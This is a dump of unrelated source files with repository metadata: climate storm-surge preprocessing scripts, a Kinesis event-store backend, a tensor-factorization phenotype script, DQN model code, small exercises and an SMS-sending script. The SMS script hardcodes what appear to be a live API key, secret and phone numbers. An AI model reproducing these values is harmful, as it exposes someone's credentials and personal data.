2db6b9d03d9ffa6ad05fa7db612b7e2db5364dd6 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/02_preprocessing/merraLagScripts/443-tideGauge.py | 1cfa0de339d2f9659ec80f2176dd2e40a6ad8413 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
# dir_name = 'F:\\01_erainterim\\03_eraint_lagged_predictors\\eraint_D3'
dir_in = "/lustre/fs0/home/mtadesse/merraAllCombined"
dir_out = "/lustre/fs0/home/mtadesse/merraAllLagged"
def lag():
os.chdir(dir_in)
#get names
tg_list_name = sorted(os.listdir())
x = 443
y = 444
for tg in range(x, y):
os.chdir(dir_in)
tg_name = tg_list_name[tg]
print(tg_name, '\n')
pred = pd.read_csv(tg_name)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since MERRA has 3hrly data
#the lag_hrs is increased from 6(eraint) to 31(MERRA)
time_lagged = pd.DataFrame()
lag_hrs = list(range(0, 31))
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
#datafrmae that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
#merge the selected tlagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
| [
"[email protected]"
] | |
64411eeed18edf4d09de5cf319c24119d1bea4e2 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/lag82/443-tideGauge.py | 00c7b277a09c1bb696c020bb8ff48ee0b7724626 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,984 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 443
y = 444
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
# #check if the file exists
# os.chdir(dir_out)
# if (os.path.isfile(tg_name)):
# print('file already exists')
# continue
#cd to where the actual file is
os.chdir(dir_in)
pred = pd.read_csv(tg_name)
pred.sort_values(by = 'date', inplace=True)
pred.reset_index(inplace = True)
pred.drop('index', axis = 1, inplace = True)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since ERA20C has 3hrly data
#the lag_hrs is increased from 6(eraint) to 11 (era20C)
time_lagged = pd.DataFrame()
lag_hrs = [0, 6, 12, 18, 24, 30]
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
#datafrmae that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
#merge the selected tlagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
| [
"[email protected]"
] | |
f5c65c37b451bb7845cec225a79a12aa20bfce04 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /KPicBthv6WhHFGapg_17.py | 7aa3aa5f1a8fb508597b2d6bcee51885d1d6d0bd | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 595 | py | """
Create a function that returns the **number of syllables** in a simple string.
The string is made up of _short repeated words_ like `"Lalalalalalala"` (which
would have _7 syllables_ ).
### Examples
count_syllables("Hehehehehehe") ➞ 6
count_syllables("bobobobobobobobo") ➞ 8
count_syllables("NANANA") ➞ 3
### Notes
* For simplicity, please note that each syllable will consist of two letters only.
* Your code should accept strings of any case (upper, lower and mixed case).
"""
def count_syllables(txt):
t = txt.lower()
return t.count(t[0:2])
| [
"[email protected]"
] | |
f066cea6f931f46a65d678f695ba5d46150afd2f | 75402b6c851a12ae41359fdd83e89d2160c308af | /zentral/core/stores/backends/kinesis.py | a5c04ab974baab80ac23fec6e49719b18ff53a28 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-commercial-license"
] | permissive | neocode12/zentral | 7b05aeeb823a5a3d7d268cc2b01e0bf1a5e4be71 | 9ecc8d8334148627fcccaa875f100adacd7a018b | refs/heads/main | 2023-04-09T12:06:45.355559 | 2023-03-15T14:05:05 | 2023-03-15T14:05:05 | 327,651,549 | 0 | 0 | Apache-2.0 | 2021-01-07T15:30:00 | 2021-01-07T15:30:00 | null | UTF-8 | Python | false | false | 4,096 | py | import logging
import boto3
from kombu.utils import json
from zentral.core.exceptions import ImproperlyConfigured
from zentral.core.stores.backends.base import BaseEventStore
from zentral.utils.boto3 import make_refreshable_assume_role_session
logger = logging.getLogger('zentral.core.stores.backends.kinesis')
class EventStore(BaseEventStore):
max_batch_size = 500
def __init__(self, config_d):
super(EventStore, self).__init__(config_d)
self.stream = config_d["stream"]
self.region_name = config_d["region_name"]
self.credentials = {}
for k in ("aws_access_key_id", "aws_secret_access_key"):
v = config_d.get(k)
if v:
self.credentials[k] = v
self.assume_role_arn = config_d.get("assume_role_arn")
self.serialization_format = config_d.get("serialization_format", "zentral")
if self.serialization_format not in ("zentral", "firehose_v1"):
raise ImproperlyConfigured("Unknown serialization format")
def wait_and_configure(self):
session = boto3.Session(**self.credentials)
if self.assume_role_arn:
logger.info("Assume role %s", self.assume_role_arn)
session = make_refreshable_assume_role_session(
session,
{"RoleArn": self.assume_role_arn,
"RoleSessionName": "ZentralStoreKinesis"}
)
self.client = session.client('kinesis', region_name=self.region_name)
self.configured = True
def _serialize_event(self, event):
if not isinstance(event, dict):
event_d = event.serialize()
else:
event_d = event
event_id = event_d['_zentral']['id']
event_index = event_d['_zentral']['index']
partition_key = f"{event_id}{event_index}"
if self.serialization_format == "firehose_v1":
metadata = event_d.pop("_zentral")
event_type = metadata.pop("type")
created_at = metadata.pop("created_at")
tags = metadata.pop("tags", [])
objects = metadata.pop("objects", {})
serial_number = metadata.pop("machine_serial_number", None)
event_d = {
"type": event_type,
"created_at": created_at,
"tags": tags,
"probes": [probe_d["pk"] for probe_d in metadata.get("probes", [])],
"objects": [f"{k}:{v}" for k in objects for v in objects[k]],
"metadata": json.dumps(metadata),
"payload": json.dumps(event_d),
"serial_number": serial_number
}
return json.dumps(event_d).encode("utf-8"), partition_key, event_id, event_index
def store(self, event):
self.wait_and_configure_if_necessary()
data, partition_key, _, _ = self._serialize_event(event)
return self.client.put_record(StreamName=self.stream,
Data=data,
PartitionKey=partition_key)
def bulk_store(self, events):
self.wait_and_configure_if_necessary()
if self.batch_size < 2:
raise RuntimeError("bulk_store is not available when batch_size < 2")
event_keys = []
records = []
for event in events:
data, partition_key, event_id, event_index = self._serialize_event(event)
event_keys.append((event_id, event_index))
records.append({'Data': data, 'PartitionKey': partition_key})
if not records:
return
response = self.client.put_records(Records=records, StreamName=self.stream)
failed_record_count = response.get("FailedRecordCount", 0)
if failed_record_count == 0:
# shortcut
yield from event_keys
return
logger.warning("%s failed record(s)", failed_record_count)
for key, record in zip(event_keys, response.get("Records", [])):
if record.get("SequenceNumber") and record.get("ShardId"):
yield key
| [
"[email protected]"
] | |
af646b7ff78e8c9fcdc8fbc2cb08695b04778a24 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/127/usersdata/218/35224/submittedfiles/ex11.py | 4cdc5c3d13ba6d1d5401867a17bcaa65083f3520 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 543 | py | # -*- coding: utf-8 -*-
D1=int(input('digite o dia da data 1:'))
D2=int(input('digite o dia da data 2:'))
M1=int(input('digite o mês da data 1:'))
M2=int(input('digite o mês da data 2:'))
A1=int(input('digite o ano da data 1:'))
A2=int(input('digite o ano da data 2:'))
if A1>A2:
print(data1)
elif A2>A1:
print(data2)
else:
if M1>M2:
print(data1)
elif M2>M1:
print(data2)
else:
if D1>D2:
print(data1)
elif D2>D1:
print(data2)
else:
print(iguais) | [
"[email protected]"
] | |
0fc2541411dcb465d061d206bdbd4ed4a27b5913 | ea97a6d0d5ffc5ec2730b63a20b1f4de0bd8112d | /scurgen/test/axes_demo.py | a74c934af8fb6965cae2a134495e19057c3db58d | [] | no_license | daler/scurgen | 35d5ee35243a41b75c444f5bb71380ba80ba72c6 | ca0e4f30e9573684b90a8123e31982490b5fe473 | refs/heads/master | 2020-12-24T19:18:19.587609 | 2013-03-11T16:35:33 | 2013-03-11T16:35:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,375 | py | import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.gridspec as gs
import numpy as np
fig = plt.figure(figsize=(10,10))
nchroms = 21
nrows = int(np.round(np.sqrt(nchroms)))
ncols = nrows
nfiles = 3
CHROM = dict(
left= 0.05,
right=0.8,
top=0.9,
bottom=0.2,
wspace=0.1,
hspace=0.1)
SLIDER_PAD = 0.01
SLIDER = dict(
left=CHROM['left'],
right=CHROM['right'],
bottom=0.1,
top=CHROM['bottom'] - SLIDER_PAD,
hspace=0.5,
)
CBAR_PAD = 0.01
CBAR = dict(
left=CHROM['right'] + CBAR_PAD,
right=0.9,
wspace=SLIDER['hspace'],
top=CHROM['top'],
bottom=CHROM['bottom'],
)
CHECKS = dict(
top=SLIDER['top'],
bottom=SLIDER['bottom'],
left=SLIDER['right'] + CBAR_PAD,
right=CBAR['right'],
wspace=CBAR['wspace'],
hspace=SLIDER['hspace'])
chroms = gs.GridSpec(nrows, ncols)
chroms.update(**CHROM)
axs1 = [plt.subplot(i) for i in chroms]
sliders = gs.GridSpec(nfiles, 1)
sliders.update(**SLIDER)
axs2 = [plt.subplot(i) for i in sliders]
colorbars = gs.GridSpec(1, nfiles)
colorbars.update(**CBAR)
axs3 = [plt.subplot(i) for i in colorbars]
checks = gs.GridSpec(nfiles, nfiles)
checks.update(**CHECKS)
axs4 = [plt.subplot(checks[i, i]) for i in range(nfiles)]
for ax in axs2 + axs4:
ax.set_xticks([])
ax.set_yticks([])
plt.show()
| [
"[email protected]"
] | |
9854d7859fa4e053576c83e5b67de5d52be02adc | ae646229187ab11607e4889e1cf0e380b26fae5c | /experiment_code/loadtensor_runfactorization_printphenotypes.py | 7733aba7df01dbc0f8b66758c204b1db20dc5dc9 | [] | no_license | aschein/tensor_analysis | cb60caf56713cfb7191c46d3cc20c32ea591d382 | 155754be7fa8cfb97432997cb66aa37b1a7b582b | refs/heads/master | 2021-01-17T07:44:00.657311 | 2014-09-11T20:45:14 | 2014-09-11T20:45:14 | 34,183,143 | 1 | 2 | null | 2018-08-25T20:15:18 | 2015-04-18T21:19:08 | Python | UTF-8 | Python | false | false | 9,319 | py | ## this combines the 2 scripts into one comprehensive one:
##
## last modified aug 28, 2014
##
## 1. run_factorization_localadmin.py
## 2. analyze_tensor_factors_withGamma.py
##
## INPUT:
## R
## alpha
## gammaForTF: numbers separated by commas, ex: '0.001, 0.1, 0.1'
## tensor_filename
## save_folder
##
## OUTPUT:
## tensor factorizaiton results in dir save_folder/
## pheno_htn_subset_analyzed_REG_<gamma_str>.pickle
## pheno_htn_subset_analyzed_AUG_<gamma_str>.pickle
## Yinfo_htn_subset_analyzed_<gamma_str>.pickle
##
## analyzed PHENOTYPE output in save_folder/
## phenotypes_<gamma_str>.out
##
## pre-requisites: load environment -- these scripts need to be run first:
##
##
###########################################################################################
## sample inputs:
#R = 50
#alpha = 1
#gammaForTF = [0.001, 0.1, 0.1]
#save_folder = './pickle_folder_20140828/'
#tensor_input = "htn-tensor-subsetforanalysis-20140811-{0}.dat"
import sys
R = int(sys.argv[1])
alpha = float(sys.argv[2])
gammaForTF = sys.argv[3]
tensor_input = sys.argv[4]
CODE_DIR = sys.argv[5]
save_folder = sys.argv[6]
gammaForTF = gammaForTF.split(',')
gammaForTF = [float(x) for x in gammaForTF]
#load required modules:
print "loading required modules"
execfile( CODE_DIR + 'setup_python_env.py')
pheWAS_xls_file = CODE_DIR + 'ICD9-2-PheWAS.xls'
#create output folder if it does not exist
if not os.path.exists(save_folder):
os.makedirs(save_folder)
#do tensor factorization on the SUBSET - with GAMMA as set above ##################################################################################################
#laod the tensor for the subset!
print "loading tensor data"
loaded_X, loaded_axisDict, loaded_classDict = tensorIO.loadSingleTensor(tensor_input)
startTime = time.time()#start time -- to time it
##factorization
print "running factorization"
spntf_htn_subset_analyzed_withGamma = SP_NTF.SP_NTF(loaded_X, R=R, alpha=alpha)
Yinfo_htn_subset_analyzed_withGamma = spntf_htn_subset_analyzed_withGamma.computeDecomp(gamma=gammaForTF)
marbleElapse = time.time() - startTime #elapsed time
#tensor decomposition factors ("phenotypes"):
pheno_htn_subset_analyzed_withGamma_REG = spntf_htn_subset_analyzed_withGamma.M[0]
pheno_htn_subset_analyzed_withGamma_AUG = spntf_htn_subset_analyzed_withGamma.M[1]
pheno_htn_subset_analyzed_withGamma = (pheno_htn_subset_analyzed_withGamma_REG, pheno_htn_subset_analyzed_withGamma_AUG)
#string for saving the file based upon gamma
gamma_str = '_gamma'
for num in gammaForTF:
gamma_str = gamma_str + '-' + str(num)
gamma_str = gamma_str + '.pickle'
#save factorization in pickle
outfile_str = save_folder + "pheno_htn_subset_analyzed_REG" + gamma_str
with open(outfile_str, "wb") as output_file: ##IMPT! phenotype stored in this pickle
pickle.dump(pheno_htn_subset_analyzed_withGamma, output_file)
output_file.close()
outfile_str = save_folder + "pheno_htn_subset_analyzed_AUG" + gamma_str
with open(outfile_str, "wb") as output_file: ##IMPT! phenotype stored in this pickle
pickle.dump(pheno_htn_subset_analyzed_withGamma, output_file)
output_file.close()
outfile_str = save_folder + "Yinfo_htn_subset_analyzed" + gamma_str
with open(outfile_str, "wb") as output_file:
pickle.dump(Yinfo_htn_subset_analyzed_withGamma, output_file)
output_file.close()
###########################################################################################################################
##
## now, load the pickle'd phenotypes, convert to readable phenotype format, and print into output file!
##
##
import operator
def calculateValues(TM, M):
fms = TM.greedy_fms(M)
fos = TM.greedy_fos(M)
nnz = tensorTools.countTensorNNZ(M)
return fms, fos, nnz
## load the tensor #######
loaded_X, loaded_axisDict, loaded_classDict = tensorIO.loadSingleTensor(tensor_input)
##read in the pickles:
outfile_str = save_folder + "pheno_htn_subset_analyzed_REG" + gamma_str
matrix_pkl = open(outfile_str, "rb")
pheno_htn_subset_analyzed_REG_withGamma = pickle.load(matrix_pkl)
matrix_pkl.close()
outfile_str = save_folder + "Yinfo_htn_subset_analyzed" + gamma_str
matrix_pkl = open(outfile_str, "rb")
Yinfo_htn_subset_analyzed_withGamma = pickle.load(matrix_pkl)
matrix_pkl.close()
#write output file
pheno_outstream = open(save_folder + "phenotypes"+gamma_str+".out", 'w+')
##############################################################################################################
#load pheWAS dictionary
xls = pd.ExcelFile(pheWAS_xls_file)
df_pheWAS = xls.parse(xls.sheet_names[0])
d_jdrange_lookup = dict(zip(list(df_pheWAS.JD_X_RANGE), list(df_pheWAS.JD_X_NAME)))
#############################################################################################################
#tensor with all phenotypes (factorization)
ktensor_phenotypes = pheno_htn_subset_analyzed_REG_withGamma[0]
l_pts = loaded_axisDict[0].keys()
l_jdrange = loaded_axisDict[1].keys()
l_meds= loaded_axisDict[2].keys()
#will store all the data
d_pheno_nonzero_labels = OrderedDict()
#sort phenotypes by lambda values:
d_lambda_phenoNumber = OrderedDict(zip( list(range(R)),
list(ktensor_phenotypes.lmbda)
))
l_phenoNumbers_sorted_by_lambda = [tup[0] for tup in sorted(d_lambda_phenoNumber.iteritems(), key=operator.itemgetter(1))][::-1] #get a sorted list of phenotype numbers, which are sorted by using the operator.itemgetter
#print phenotype feature names #################
#for i in range(10):
for i in l_phenoNumbers_sorted_by_lambda:
print "===== phenotype " + str(i) + "================================================================="
pheno_outstream.write("===== phenotype " + str(i) + "=================================================================" + '\n')
this_lmbda = ktensor_phenotypes.lmbda[i]
this_pheno_pt_factor = ktensor_phenotypes.U[0][:,i]
this_pheno_jdrange_factor = ktensor_phenotypes.U[1][:,i]
this_pheno_med_factor = ktensor_phenotypes.U[2][:,i]
this_pheno_pt_nnz = np.nonzero(this_pheno_pt_factor)[0]
this_pheno_jdrange_nnz = np.nonzero(this_pheno_jdrange_factor)[0]
this_pheno_med_nnz = np.nonzero(this_pheno_med_factor)[0]
l_nonzero_pt_thisPheno = []
l_nonzero_meds_thisPheno = []
l_nonzero_jdrange_thisPheno = []
l_nonzero_jdrange_names_thisPheno = []
for j in this_pheno_pt_nnz:
l_nonzero_pt_thisPheno.append(l_pts[j])
for j in this_pheno_jdrange_nnz:
l_nonzero_jdrange_thisPheno.append(l_jdrange[j])
l_nonzero_jdrange_names_thisPheno.append(d_jdrange_lookup[l_jdrange[j]])
for j in this_pheno_med_nnz:
l_nonzero_meds_thisPheno.append(l_meds[j])
#data
d_pheno_nonzero_labels[i] = dict() #for phenotype i
d_pheno_nonzero_labels[i]['LAMBDA'] = this_lmbda #lambda value
d_pheno_nonzero_labels[i]['PERCENT_PTS'] = len(l_nonzero_pt_thisPheno) / float(len(this_pheno_pt_factor))
d_pheno_nonzero_labels[i]['MEDS_NZ'] = l_nonzero_meds_thisPheno #for phenotype i
d_pheno_nonzero_labels[i]['JDRANGE_NZ'] = l_nonzero_jdrange_thisPheno #for phenotype i
d_pheno_nonzero_labels[i]['JDRANGE_NAMES_NZ'] = l_nonzero_jdrange_names_thisPheno #for phenotype i
print "proportion of pts: " + str(d_pheno_nonzero_labels[i]['PERCENT_PTS'])
pheno_outstream.write("proportion of pts: " + str(d_pheno_nonzero_labels[i]['PERCENT_PTS']) + '\n')
print "lambda: " + str(this_lmbda)
pheno_outstream.write("lambda: " + str(this_lmbda) + '\n')
print "----------------------------------------" #divider
pheno_outstream.write("----------------------------------------" + '\n')
#make ranking of JDRANGE by the weights:
nparr_jdrange_weights = this_pheno_jdrange_factor[this_pheno_jdrange_nnz]
d_jdrangeindex_weights = OrderedDict(zip(this_pheno_jdrange_nnz, nparr_jdrange_weights))
l_jdrangeindex_sorted = [tup[0] for tup in sorted(d_jdrangeindex_weights.iteritems(), key=operator.itemgetter(1))][::-1] #note: use slice [::-1] to reverse list!
for index_this_jdrange in l_jdrangeindex_sorted:
print d_jdrange_lookup[l_jdrange[index_this_jdrange]] + '\t' + str("%.3f" %this_pheno_jdrange_factor[index_this_jdrange] )
pheno_outstream.write(str(d_jdrange_lookup[l_jdrange[index_this_jdrange]]) + '\t' + str("%.3f" %this_pheno_jdrange_factor[index_this_jdrange]) +'\n')
print "----------------------------------------" #divider between diagnostic codes and meds
pheno_outstream.write("----------------------------------------" + '\n')
#make ranking of MED by the weights:
nparr_med_weights = this_pheno_med_factor[this_pheno_med_nnz]
d_medindex_weights = OrderedDict(zip(this_pheno_med_nnz, nparr_med_weights))
l_medindex_sorted = [tup[0] for tup in sorted(d_medindex_weights.iteritems(), key=operator.itemgetter(1))][::-1]
for index_this_med in l_medindex_sorted:
print l_meds[index_this_med] + '\t' + str("%.3f" %this_pheno_med_factor[index_this_med])
pheno_outstream.write(l_meds[index_this_med] + '\t' + str("%.3f" %this_pheno_med_factor[index_this_med]) + '\n')
pheno_outstream.close()
| [
"[email protected]"
] | |
6fbab4480a4dbe295810065fd70027aba431136e | 65fcf07ea6d6dfe0c5a4090343b098807e075010 | /app/send_sms.py | ddf1616e9f2939a4869869007f444ac64bf91988 | [] | no_license | parkhongbeen/study_selenium | 0e7e0bc23809c57c29d5352e2ee81b9a74060026 | f1bdfd3c3aa3299791cc53363eea0a811c6dcedc | refs/heads/master | 2021-04-20T11:27:39.522904 | 2020-03-26T12:54:59 | 2020-03-26T12:54:59 | 249,679,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | from sdk.api.message import Message
api_key = "NCSGLMHSQ2FTVZUA"
api_secret = "LCSOKSWPDNLZF971PMZ4XAQPZPYD60EW"
params = dict()
params['type'] = 'sms'
params['to'] = '01082128997'
params['from'] = '01050022354'
params['text'] = '야 홍빈아 내가 내일 커피사줄께'
cool = Message(api_key, api_secret)
try:
response = cool.send(params)
except:
print('에러')
| [
"[email protected]"
] | |
7734622e41048306a547129450508bf4c50e9f13 | 094627e84a63cdeb97c8917cc6581cc55fa8f583 | /brl_baselines/deepq/models.py | 4309da5e793c8494de2fd8a12a042c7a978427f7 | [
"BSD-3-Clause"
] | permissive | gilwoolee/brl_baselines | 844f23b31f53648796325d13cb3c252cda0fc55d | c85df28c0f2dfbd69d3d27928bcbabf36a3663bb | refs/heads/master | 2022-11-28T22:31:31.195138 | 2020-08-04T02:17:28 | 2020-08-04T02:17:28 | 278,916,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,059 | py | import tensorflow as tf
import tensorflow.contrib.layers as layers
def _mlp(hiddens, input_, num_actions, scope, reuse=False, layer_norm=False):
with tf.variable_scope(scope, reuse=reuse):
out = input_
for hidden in hiddens:
out = layers.fully_connected(out, num_outputs=hidden, activation_fn=None)
if layer_norm:
out = layers.layer_norm(out, center=True, scale=True)
out = tf.nn.relu(out)
q_out = layers.fully_connected(out, num_outputs=num_actions, activation_fn=None)
return q_out
def mlp(hiddens=[], layer_norm=False):
"""This model takes as input an observation and returns values of all actions.
Parameters
----------
hiddens: [int]
list of sizes of hidden layers
layer_norm: bool
if true applies layer normalization for every layer
as described in https://arxiv.org/abs/1607.06450
Returns
-------
q_func: function
q_function for DQN algorithm.
"""
return lambda *args, **kwargs: _mlp(hiddens, layer_norm=layer_norm, *args, **kwargs)
def _cnn_to_mlp(convs, hiddens, dueling, input_, num_actions, scope, reuse=False, layer_norm=False):
with tf.variable_scope(scope, reuse=reuse):
out = input_
with tf.variable_scope("convnet"):
for num_outputs, kernel_size, stride in convs:
out = layers.convolution2d(out,
num_outputs=num_outputs,
kernel_size=kernel_size,
stride=stride,
activation_fn=tf.nn.relu)
conv_out = layers.flatten(out)
with tf.variable_scope("action_value"):
action_out = conv_out
for hidden in hiddens:
action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)
if layer_norm:
action_out = layers.layer_norm(action_out, center=True, scale=True)
action_out = tf.nn.relu(action_out)
action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)
if dueling:
with tf.variable_scope("state_value"):
state_out = conv_out
for hidden in hiddens:
state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)
if layer_norm:
state_out = layers.layer_norm(state_out, center=True, scale=True)
state_out = tf.nn.relu(state_out)
state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)
action_scores_mean = tf.reduce_mean(action_scores, 1)
action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)
q_out = state_score + action_scores_centered
else:
q_out = action_scores
return q_out
def cnn_to_mlp(convs, hiddens, dueling=False, layer_norm=False):
"""This model takes as input an observation and returns values of all actions.
Parameters
----------
convs: [(int, int, int)]
list of convolutional layers in form of
(num_outputs, kernel_size, stride)
hiddens: [int]
list of sizes of hidden layers
dueling: bool
if true double the output MLP to compute a baseline
for action scores
layer_norm: bool
if true applies layer normalization for every layer
as described in https://arxiv.org/abs/1607.06450
Returns
-------
q_func: function
q_function for DQN algorithm.
"""
return lambda *args, **kwargs: _cnn_to_mlp(convs, hiddens, dueling, layer_norm=layer_norm, *args, **kwargs)
def build_q_func(network, hiddens=[24], dueling=False, layer_norm=False, **network_kwargs):
if isinstance(network, str):
from baselines.common.models import get_network_builder
network = get_network_builder(network)(**network_kwargs)
def q_func_builder(input_placeholder, num_actions, scope, reuse=False):
with tf.variable_scope(scope, reuse=reuse):
print("Scope", scope, reuse, input_placeholder)
latent = network(input_placeholder)
if isinstance(latent, tuple):
if latent[1] is not None:
raise NotImplementedError("DQN is not compatible with recurrent policies yet")
latent = latent[0]
latent = layers.flatten(latent)
with tf.variable_scope("action_value"):
action_out = latent
# for hidden in hiddens:
# action_out = layers.fully_connected(action_out, num_outputs=hidden, activation_fn=None)
# if layer_norm:
# action_out = layers.layer_norm(action_out, center=True, scale=True)
# action_out = tf.nn.relu(action_out)
action_scores = layers.fully_connected(action_out, num_outputs=num_actions, activation_fn=None)
if dueling:
with tf.variable_scope("state_value"):
state_out = latent
# for hidden in hiddens:
# state_out = layers.fully_connected(state_out, num_outputs=hidden, activation_fn=None)
# if layer_norm:
# state_out = layers.layer_norm(state_out, center=True, scale=True)
# state_out = tf.nn.relu(state_out)
state_score = layers.fully_connected(state_out, num_outputs=1, activation_fn=None)
action_scores_mean = tf.reduce_mean(action_scores, 1)
action_scores_centered = action_scores - tf.expand_dims(action_scores_mean, 1)
q_out = state_score + action_scores_centered
else:
q_out = action_scores
return q_out
return q_func_builder
| [
"[email protected]"
] | |
3dcd85c38401d06af2e66326a9b522210cb53cf9 | 1f006f0c7871fcde10986c4f5cec916f545afc9f | /apps/ice/plugins/oxml/oxml2xhtml_basic_states.py | aa5a0c3fb0c927117618d8300e5a12d3ff58f720 | [] | no_license | ptsefton/integrated-content-environment | 248b8cd29b29e8989ec1a154dd373814742a38c1 | c1d6b5a1bea3df4dde10cb582fb0da361dd747bc | refs/heads/master | 2021-01-10T04:46:09.319989 | 2011-05-05T01:42:52 | 2011-05-05T01:42:52 | 36,273,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,587 | py | # Copyright (C) 2010 Distance and e-Learning Centre,
# University of Southern Queensland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
